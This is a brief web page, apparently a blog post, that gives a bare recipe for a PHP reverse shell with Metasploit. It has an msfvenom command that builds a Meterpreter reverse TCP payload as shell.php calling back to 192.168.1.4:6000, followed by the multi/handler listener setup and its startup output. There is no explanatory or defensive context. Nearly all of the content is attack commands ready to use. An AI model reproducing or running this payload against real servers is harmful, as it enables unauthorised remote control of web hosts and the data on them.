Metasploit PHP Reverse Shell

 msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.4 LPORT=6000 -f raw > shell.php 
msf > use exploit/multi/handler
msf  exploit(handler) > set LHOST 192.168.1.4
msf  exploit(handler) > set LPORT 6000
msf  exploit(handler) > set payload php/meterpreter_reverse_tcp
msf  exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.4:6000
[*] Starting the payload handler...

Leave a Reply

Your email address will not be published. Required fields are marked *